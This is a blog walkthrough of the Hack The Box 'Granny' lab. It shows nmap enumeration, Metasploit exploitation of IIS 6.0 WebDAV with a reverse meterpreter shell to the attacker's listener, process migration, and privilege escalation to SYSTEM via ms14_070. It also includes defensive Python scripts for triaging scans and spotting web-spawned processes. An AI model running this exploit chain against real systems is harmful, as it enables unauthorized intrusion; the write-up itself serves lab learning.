DEV Community

ikkyu

【Hack the Box】Granny - Walkthrough

From the HacktheBox

twitter:@ikk_hck

Enumeration

Anyway, nmap.

```
$ nmap -sC -sV -A -oA granny 10.10.10.15
Starting Nmap 7.91 ( https://nmap.org ) at 2021-05-10 03:19 PDT
```

Here are the results.

```
# Nmap 7.91 scan initiated Sat May  8 01:11:23 2021 as: nmap -sC -sV -A -oA granny 10.10.10.15
Nmap scan report for 10.10.10.15
Host is up (0.19s latency).
Not shown: 999 filtered ports
PORT   STATE SERVICE VERSION
80/tcp open  http    Microsoft IIS httpd 6.0
| http-methods:
|_  Potentially risky methods: TRACE DELETE COPY MOVE PROPFIND PROPPATCH SEARCH MKCOL LOCK UNLOCK PUT
|_http-server-header: Microsoft-IIS/6.0
|_http-title: Error
| http-webdav-scan:
|   Server Type: Microsoft-IIS/6.0
|   Public Options: OPTIONS, TRACE, GET, HEAD, DELETE, PUT, POST, COPY, MOVE, MKCOL, PROPFIND, PROPPATCH, LOCK, UNLOCK, SEARCH
|   Allowed Methods: OPTIONS, TRACE, GET, HEAD, DELETE, COPY, MOVE, PROPFIND, PROPPATCH, SEARCH, MKCOL, LOCK, UNLOCK
|   WebDAV type: Unknown
|_  Server Date: Sat, 08 May 2021 08:13:22 GMT
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Sat May  8 01:11:48 2021 -- 1 IP address (1 host up) scanned in 25.44 seconds
```

Only port 80 is open, and it is Microsoft IIS httpd 6.0 with WebDAV enabled (note the PUT, MOVE and COPY methods in the http-methods output).
I'll search for it in Metasploit.
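That scan output is the kind of thing worth triaging automatically on the defensive side: an out-of-support IIS version plus advertised WebDAV write methods is the exposure this box is built on. The script below is an added example and not part of the original post; the sample text is a constructed, abridged copy of the nmap result above, and the function names (`parse_http_findings`, `assess`, `triage`) and the `WRITE_METHODS` / `EOL_IIS` sets are my own choices.

```python
import re

# Constructed sample in the shape of nmap's normal output for the scan above
# (abridged to the lines the parser cares about).
SAMPLE_NMAP = """\
Nmap scan report for 10.10.10.15
Host is up (0.19s latency).
PORT   STATE SERVICE VERSION
80/tcp open  http    Microsoft IIS httpd 6.0
| http-methods:
|_  Potentially risky methods: TRACE DELETE COPY MOVE PROPFIND PROPPATCH SEARCH MKCOL LOCK UNLOCK PUT
|_http-server-header: Microsoft-IIS/6.0
|_http-title: Error
| http-webdav-scan:
|   Server Type: Microsoft-IIS/6.0
|   Allowed Methods: OPTIONS, TRACE, GET, HEAD, DELETE, COPY, MOVE, PROPFIND, PROPPATCH, SEARCH, MKCOL, LOCK, UNLOCK
|   WebDAV type: Unknown
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
"""

# HTTP/WebDAV methods that let a client create, change, rename or delete content.
WRITE_METHODS = {"PUT", "DELETE", "COPY", "MOVE", "MKCOL", "PROPPATCH", "LOCK", "UNLOCK"}
# IIS versions whose host OS is out of support (6.0 shipped with Windows Server 2003,
# unsupported since 2015).
EOL_IIS = {"5.0", "5.1", "6.0"}


def parse_http_findings(nmap_text):
    """Extract the server header, the http-methods risky list and the WebDAV
    allowed methods from nmap normal output. Missing items stay empty."""
    findings = {"server": "", "risky_methods": set(), "webdav": False, "webdav_allowed": set()}
    for line in nmap_text.splitlines():
        body = line.lstrip("|_ ").strip()  # drop nmap's script-output gutter
        if body.startswith("http-server-header:"):
            findings["server"] = body.split(":", 1)[1].strip()
        elif body.startswith("Potentially risky methods:"):
            findings["risky_methods"] = set(body.split(":", 1)[1].split())
        elif body.startswith("http-webdav-scan"):
            findings["webdav"] = True
        elif body.startswith("Allowed Methods:"):
            findings["webdav_allowed"] = {m.strip() for m in body.split(":", 1)[1].split(",") if m.strip()}
    return findings


def assess(findings):
    """Turn parsed findings into remediation items (empty list = nothing flagged)."""
    issues = []
    m = re.search(r"Microsoft-IIS/(\d+\.\d+)", findings["server"])
    if m and m.group(1) in EOL_IIS:
        issues.append(f"IIS {m.group(1)} is out of support: no security fixes; isolate or decommission the host")
    exposed = (findings["risky_methods"] | findings["webdav_allowed"]) & WRITE_METHODS
    if findings["webdav"] and exposed:
        issues.append("WebDAV advertises write methods (%s): disable WebDAV or require authentication"
                      % ", ".join(sorted(exposed)))
    if "TRACE" in findings["risky_methods"]:
        issues.append("TRACE enabled: turn it off")
    return issues


def triage(nmap_text):
    """Parse and assess in one call; returns the list of issues."""
    return assess(parse_http_findings(nmap_text))


if __name__ == "__main__":
    for issue in triage(SAMPLE_NMAP):
        print("-", issue)
```

Run it against `nmap -oN` output instead of the embedded sample and it produces the three findings a defender would open tickets for on this host: the unsupported server version, the WebDAV write methods, and TRACE.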

```
$ msfconsole

       =[ metasploit v6.0.40-dev                          ]
+ -- --=[ 2119 exploits - 1138 auxiliary - 360 post       ]
+ -- --=[ 592 payloads - 45 encoders - 10 nops            ]
+ -- --=[ 8 evasion                                       ]

Metasploit tip: Adapter names can be used for IP params set LHOST eth0

msf6 > search iis 6.0

Matching Modules
================

   #  Name                                                 Disclosure Date  Rank    Check  Description
   -  ----                                                 ---------------  ----    -----  -----------
   0  exploit/windows/firewall/blackice_pam_icq            2004-03-18       great   No     ISS PAM.dll ICQ Parser Buffer Overflow
   1  auxiliary/dos/windows/http/ms10_065_ii6_asp_dos      2010-09-14       normal  No     Microsoft IIS 6.0 ASP Stack Exhaustion Denial of Service
   2  exploit/windows/iis/iis_webdav_scstoragepathfromurl  2017-03-26       manual  Yes    Microsoft IIS WebDav ScStoragePathFromUrl Overflow


Interact with a module by name or index. For example info 2, use 2 or use exploit/windows/iis/iis_webdav_scstoragepathfromurl
```

Exploit

Found it. I select the module, set the target (RHOSTS) and listener (LHOST) addresses, confirm with `check`, and run it.

```
msf6 > use 2
[*] No payload configured, defaulting to windows/meterpreter/reverse_tcp
msf6 exploit(windows/iis/iis_webdav_scstoragepathfromurl) > show options

Module options (exploit/windows/iis/iis_webdav_scstoragepathfromurl):

   Name           Current Setting  Required  Description
   ----           ---------------  --------  -----------
   MAXPATHLENGTH  60               yes       End of physical path brute force
   MINPATHLENGTH  3                yes       Start of physical path brute force
   Proxies                         no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS                          yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
   RPORT          80               yes       The target port (TCP)
   SSL            false            no        Negotiate SSL/TLS for outgoing connections
   TARGETURI      /                yes       Path of IIS 6 web application
   VHOST                           no        HTTP server virtual host


Payload options (windows/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  process          yes       Exit technique (Accepted: '', seh, thread, process, none)
   LHOST     172.20.10.2      yes       The listen address (an interface may be specified)
   LPORT     4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Microsoft Windows Server 2003 R2 SP2 x86


msf6 exploit(windows/iis/iis_webdav_scstoragepathfromurl) > set rhost 10.10.10.15
rhost => 10.10.10.15
msf6 exploit(windows/iis/iis_webdav_scstoragepathfromurl) > set lhost 10.10.14.5
lhost => 10.10.14.5
msf6 exploit(windows/iis/iis_webdav_scstoragepathfromurl) > check
[+] 10.10.10.15:80 - The target is vulnerable.
msf6 exploit(windows/iis/iis_webdav_scstoragepathfromurl) > run

[*] Started reverse TCP handler on 10.10.14.5:4444
[*] Trying path length 3 to 60 ...
[*] Sending stage (175174 bytes) to 10.10.10.15
[*] Meterpreter session 1 opened (10.10.14.5:4444 -> 10.10.10.15:1030) at 2021-05-10 03:24:21 -0700

meterpreter >
```

The intrusion was successful.

PE (privilege escalation)

```
meterpreter > getuid
[-] stdapi_sys_config_getuid: Operation failed: Access is denied.
```

I try to check which user the session is running as, but even that fails with "Access is denied".
Let's look at the process list instead.

```
meterpreter > ps

Process List
============

 PID   PPID  Name               Arch  Session  User                          Path
 ---   ----  ----               ----  -------  ----                          ----
 0     0     [System Process]
 4     0     System
 272   4     smss.exe
 324   272   csrss.exe
 348   272   winlogon.exe
 396   348   services.exe
 408   348   lsass.exe
 596   396   svchost.exe
 680   396   svchost.exe
 736   396   svchost.exe
 784   396   svchost.exe
 800   396   svchost.exe
 936   396   spoolsv.exe
 964   396   msdtc.exe
 1084  396   cisvc.exe
 1124  396   svchost.exe
 1180  396   inetinfo.exe
 1216  396   svchost.exe
 1332  396   VGAuthService.exe
 1412  396   vmtoolsd.exe
 1464  396   svchost.exe
 1628  396   svchost.exe
 1732  396   dllhost.exe
 1816  396   alg.exe
 1832  596   wmiprvse.exe       x86   0        NT AUTHORITY\NETWORK SERVICE  C:\WINDOWS\system32\wbem\wmiprvse.exe
 1900  396   dllhost.exe
 2120  396   vssvc.exe
 2176  1464  w3wp.exe           x86   0        NT AUTHORITY\NETWORK SERVICE  c:\windows\system32\inetsrv\w3wp.exe
 2244  596   davcdata.exe       x86   0        NT AUTHORITY\NETWORK SERVICE  C:\WINDOWS\system32\inetsrv\davcdata.exe
 2308  2176  rundll32.exe       x86   0                                      C:\WINDOWS\system32\rundll32.exe
 2488  596   wmiprvse.exe
```

Which process is my session running in?

```
meterpreter > getpid
Current pid: 2308
```

I see: PID 2308 is the rundll32.exe that w3wp.exe spawned, and it shows no user in the listing. I'll migrate into one of the processes running as "NT AUTHORITY\NETWORK SERVICE" instead.

```
meterpreter > migrate 2244
[*] Migrating from 2308 to 2244...
[*] Migration completed successfully.
```

Checking the user again now shows "NT AUTHORITY\NETWORK SERVICE".

```
meterpreter > getuid
Server username: NT AUTHORITY\NETWORK SERVICE
```
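From the defender's side, the interesting line in that process list is PID 2308: a `rundll32.exe` whose parent is the IIS worker `w3wp.exe`, with no user shown. A web server process spawning anything other than its own helpers is the classic post-exploitation signal, and it is easy to check from a process listing. The script below is an added example and not part of the original post; the sample listing is a constructed subset of the `ps` output above, and the `parse_ps`, `ancestry` and `find_web_spawned` names and the `WEB_WORKERS` set are my own.

```python
import re

# Constructed sample modelled on the meterpreter `ps` listing above
# (columns: PID PPID Name Arch Session User Path; unknown columns are blank).
SAMPLE_PS = r"""
 PID   PPID  Name               Arch  Session  User                          Path
 ---   ----  ----               ----  -------  ----                          ----
 4     0     System
 348   272   winlogon.exe
 396   348   services.exe
 596   396   svchost.exe
 1180  396   inetinfo.exe
 1464  396   svchost.exe
 1832  596   wmiprvse.exe       x86   0        NT AUTHORITY\NETWORK SERVICE  C:\WINDOWS\system32\wbem\wmiprvse.exe
 2176  1464  w3wp.exe           x86   0        NT AUTHORITY\NETWORK SERVICE  c:\windows\system32\inetsrv\w3wp.exe
 2244  596   davcdata.exe       x86   0        NT AUTHORITY\NETWORK SERVICE  C:\WINDOWS\system32\inetsrv\davcdata.exe
 2308  2176  rundll32.exe       x86   0                                      C:\WINDOWS\system32\rundll32.exe
 2488  596   wmiprvse.exe
"""

# IIS processes that handle untrusted input; a descendant of one of these is suspect.
WEB_WORKERS = {"w3wp.exe", "inetinfo.exe"}

# PID, PPID, Name, then optionally Arch, Session and the rest of the row (User + Path).
ROW = re.compile(r"^\s*(\d+)\s+(\d+)\s+(\S+)(?:\s+(\S+)\s+(\d+)\s+(.*))?$")


def parse_ps(text):
    """Parse the listing into {pid: {pid, ppid, name, user}}; user is '' when blank."""
    procs = {}
    for line in text.splitlines():
        m = ROW.match(line.rstrip())
        if not m:
            continue
        pid, ppid, name, rest = int(m.group(1)), int(m.group(2)), m.group(3), m.group(6)
        user = ""
        if rest:
            # User and Path are separated by column padding (2+ spaces); a lone
            # drive-letter path means the User column was empty.
            parts = re.split(r"\s{2,}", rest.strip())
            if len(parts) == 2 or ":\\" not in parts[0]:
                user = parts[0]
        procs[pid] = {"pid": pid, "ppid": ppid, "name": name, "user": user}
    return procs


def ancestry(procs, pid):
    """Names of pid and its ancestors, root first; stops at unknown PIDs or loops."""
    chain, seen = [], set()
    while pid in procs and pid not in seen:
        seen.add(pid)
        chain.append(procs[pid]["name"])
        pid = procs[pid]["ppid"]
    return chain[::-1]


def find_web_spawned(procs):
    """Processes with an IIS worker somewhere above them in the tree.
    Returns (pid, name, 'root > ... > name') tuples, lowest PID first."""
    hits = []
    for p in sorted(procs.values(), key=lambda q: q["pid"]):
        if p["name"] in WEB_WORKERS:
            continue
        lineage = ancestry(procs, p["ppid"])
        if any(n in WEB_WORKERS for n in lineage):
            hits.append((p["pid"], p["name"], " > ".join(lineage + [p["name"]])))
    return hits


if __name__ == "__main__":
    for pid, name, path in find_web_spawned(parse_ps(SAMPLE_PS)):
        print(f"suspicious: pid {pid} {name} ({path})")
```

On the sample it reports exactly one process, the rundll32.exe under w3wp.exe. The same parent-child rule (web worker as an ancestor of a shell, script host or rundll32) is what an EDR or Sysmon process-creation rule would alert on for this box.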

Background the session and go back to msfconsole to look for a local exploit that can be used for privilege escalation.

```
meterpreter > background
[*] Backgrounding session 1...
msf6 exploit(windows/iis/iis_webdav_scstoragepathfromurl) > use post/multi/recon/local_exploit_suggester
msf6 post(multi/recon/local_exploit_suggester) > set session 1
session => 1
msf6 post(multi/recon/local_exploit_suggester) > run

[*] 10.10.10.15 - Collecting local exploits for x86/windows...
[*] 10.10.10.15 - 37 exploit checks are being tried...
[+] 10.10.10.15 - exploit/windows/local/ms10_015_kitrap0d: The service is running, but could not be validated.
[+] 10.10.10.15 - exploit/windows/local/ms14_058_track_popup_menu: The target appears to be vulnerable.
[+] 10.10.10.15 - exploit/windows/local/ms14_070_tcpip_ioctl: The target appears to be vulnerable.
[+] 10.10.10.15 - exploit/windows/local/ms15_051_client_copy_image: The target appears to be vulnerable.
[+] 10.10.10.15 - exploit/windows/local/ms16_016_webdav: The service is running, but could not be validated.
[+] 10.10.10.15 - exploit/windows/local/ms16_075_reflection: The target appears to be vulnerable.
[+] 10.10.10.15 - exploit/windows/local/ppr_flatten_rec: The target appears to be vulnerable.
[*] Post module execution completed
msf6 post(multi/recon/local_exploit_suggester) > use exploit/windows/local/ms14_058_track_popup_menu
[*] No payload configured, defaulting to windows/meterpreter/reverse_tcp
msf6 exploit(windows/local/ms14_058_track_popup_menu) > show options

Module options (exploit/windows/local/ms14_058_track_popup_menu):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   SESSION                   yes       The session to run this module on.


Payload options (windows/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  thread           yes       Exit technique (Accepted: '', seh, thread, process, none)
   LHOST     172.20.10.2      yes       The listen address (an interface may be specified)
   LPORT     4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Windows x86


msf6 exploit(windows/local/ms14_058_track_popup_menu) > set session 1
session => 1
msf6 exploit(windows/local/ms14_058_track_popup_menu) > set lhost 10.10.14.5
lhost => 10.10.14.5
msf6 exploit(windows/local/ms14_058_track_popup_menu) > run

[*] Started reverse TCP handler on 10.10.14.5:4444
[*] Launching notepad to host the exploit...
[+] Process 1824 launched.
[*] Reflectively injecting the exploit DLL into 1824...
[*] Injecting exploit into 1824...
[*] Exploit injected. Injecting payload into 1824...
[*] Payload injected. Executing exploit...
[+] Exploit finished, wait for (hopefully privileged) payload execution to complete.
[*] Exploit completed, but no session was created.
```

I tried "ms14_058_track_popup_menu" first, but no session came back.
Next, "ms14_070_tcpip_ioctl".

```
msf6 exploit(windows/local/ms14_058_track_popup_menu) > use exploit/windows/local/ms14_070_tcpip_ioctl
[*] No payload configured, defaulting to windows/meterpreter/reverse_tcp
msf6 exploit(windows/local/ms14_070_tcpip_ioctl) > show options

Module options (exploit/windows/local/ms14_070_tcpip_ioctl):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   SESSION                   yes       The session to run this module on.


Payload options (windows/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  thread           yes       Exit technique (Accepted: '', seh, thread, process, none)
   LHOST     172.20.10.2      yes       The listen address (an interface may be specified)
   LPORT     4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Windows Server 2003 SP2


msf6 exploit(windows/local/ms14_070_tcpip_ioctl) > set session 1
session => 1
msf6 exploit(windows/local/ms14_070_tcpip_ioctl) > set lhost 10.10.14.5
lhost => 10.10.14.5
msf6 exploit(windows/local/ms14_070_tcpip_ioctl) > run

[*] Started reverse TCP handler on 10.10.14.5:4444
[*] Storing the shellcode in memory...
[*] Triggering the vulnerability...
[*] Checking privileges after exploitation...
[+] Exploitation successful!
[*] Sending stage (175174 bytes) to 10.10.10.15
[*] Meterpreter session 2 opened (10.10.14.5:4444 -> 10.10.10.15:1031) at 2021-05-10 03:32:40 -0700

meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
```

This one succeeded: a second session opened, and `getuid` in it reports "NT AUTHORITY\SYSTEM".
From there, browse the filesystem as shown below to find the flag.

```
meterpreter > cd /
meterpreter > ls

Listing: C:\
============

Mode              Size    Type  Last modified              Name
----              ----    ----  -------------              ----
40777/rwxrwxrwx   0       dir   2017-04-12 07:27:12 -0700  ADFS
100777/rwxrwxrwx  0       fil   2017-04-12 07:04:44 -0700  AUTOEXEC.BAT
100666/rw-rw-rw-  0       fil   2017-04-12 07:04:44 -0700  CONFIG.SYS
40777/rwxrwxrwx   0       dir   2017-04-12 06:42:38 -0700  Documents and Settings
40777/rwxrwxrwx   0       dir   2017-04-12 07:17:24 -0700  FPSE_search
100444/r--r--r--  0       fil   2017-04-12 07:04:44 -0700  IO.SYS
40777/rwxrwxrwx   0       dir   2017-04-12 07:16:33 -0700  Inetpub
100444/r--r--r--  0       fil   2017-04-12 07:04:44 -0700  MSDOS.SYS
100555/r-xr-xr-x  47772   fil   2007-02-18 04:00:00 -0800  NTDETECT.COM
40555/r-xr-xr-x   0       dir   2017-04-12 06:43:02 -0700  Program Files
40777/rwxrwxrwx   0       dir   2017-04-12 12:02:02 -0700  RECYCLER
40777/rwxrwxrwx   0       dir   2017-04-12 06:42:38 -0700  System Volume Information
40777/rwxrwxrwx   0       dir   2017-04-12 06:41:07 -0700  WINDOWS
100666/rw-rw-rw-  208     fil   2017-04-12 06:42:08 -0700  boot.ini
100444/r--r--r--  297072  fil   2007-02-18 04:00:00 -0800  ntldr
0000/---------    0       fif   1969-12-31 16:00:00 -0800  pagefile.sys
40777/rwxrwxrwx   0       dir   2017-04-12 07:05:06 -0700  wmpub

meterpreter > cd Documents\ and\ Settings
meterpreter > ls

Listing: C:\Documents and Settings
==================================

Mode             Size  Type  Last modified              Name
----             ----  ----  -------------              ----
40777/rwxrwxrwx  0     dir   2017-04-12 07:12:15 -0700  Administrator
40777/rwxrwxrwx  0     dir   2017-04-12 06:42:38 -0700  All Users
40777/rwxrwxrwx  0     dir   2017-04-12 06:42:38 -0700  Default User
40777/rwxrwxrwx  0     dir   2017-04-12 12:19:46 -0700  Lakis
40777/rwxrwxrwx  0     dir   2017-04-12 07:08:32 -0700  LocalService
40777/rwxrwxrwx  0     dir   2017-04-12 07:08:31 -0700  NetworkService

meterpreter > cd Administrator
meterpreter > ls

Listing: C:\Documents and Settings\Administrator
================================================

Mode              Size    Type  Last modified              Name
----              ----    ----  -------------              ----
40555/r-xr-xr-x   0       dir   2017-04-12 07:12:15 -0700  Application Data
40777/rwxrwxrwx   0       dir   2017-04-12 07:12:15 -0700  Cookies
40777/rwxrwxrwx   0       dir   2017-04-12 07:12:15 -0700  Desktop
40555/r-xr-xr-x   0       dir   2017-04-12 07:12:15 -0700  Favorites
40777/rwxrwxrwx   0       dir   2017-04-12 07:12:15 -0700  Local Settings
40555/r-xr-xr-x   0       dir   2017-04-12 07:12:15 -0700  My Documents
100666/rw-rw-rw-  786432  fil   2017-04-12 07:12:15 -0700  NTUSER.DAT
40777/rwxrwxrwx   0       dir   2017-04-12 07:12:15 -0700  NetHood
40777/rwxrwxrwx   0       dir   2017-04-12 07:12:15 -0700  PrintHood
40555/r-xr-xr-x   0       dir   2017-04-12 07:12:15 -0700  Recent
40555/r-xr-xr-x   0       dir   2017-04-12 07:12:15 -0700  SendTo
40555/r-xr-xr-x   0       dir   2017-04-12 07:12:15 -0700  Start Menu
100666/rw-rw-rw-  0       fil   2017-04-12 07:12:15 -0700  Sti_Trace.log
40777/rwxrwxrwx   0       dir   2017-04-12 07:12:15 -0700  Templates
40777/rwxrwxrwx   0       dir   2017-04-12 11:48:10 -0700  UserData
100666/rw-rw-rw-  1024    fil   2017-04-12 07:12:15 -0700  ntuser.dat.LOG
100666/rw-rw-rw-  178     fil   2017-04-12 07:12:15 -0700  ntuser.ini

meterpreter > cd Desktop
meterpreter > ls

Listing: C:\Documents and Settings\Administrator\Desktop
========================================================

Mode              Size  Type  Last modified              Name
----              ----  ----  -------------              ----
100444/r--r--r--  32    fil   2017-04-12 07:28:50 -0700  root.txt
```

Incidentally

If you run the privilege escalation without first migrating out of the original process, you get the following. The module checks the session's privileges by calling `stdapi_sys_config_getsid`, and from the rundll32.exe process that call fails with "Access is denied", just as `getuid` did earlier, so the module gives up before exploiting anything.

```
msf6 exploit(windows/local/ms14_070_tcpip_ioctl) > set lhost 10.10.14.5
lhost => 10.10.14.5
msf6 exploit(windows/local/ms14_070_tcpip_ioctl) > set session 1
session => 1
msf6 exploit(windows/local/ms14_070_tcpip_ioctl) > run

[*] Started reverse TCP handler on 10.10.14.5:4444
[-] Exploit failed: Rex::Post::Meterpreter::RequestError stdapi_sys_config_getsid: Operation failed: Access is denied.
[*] Exploit completed, but no session was created.
```

Good night.
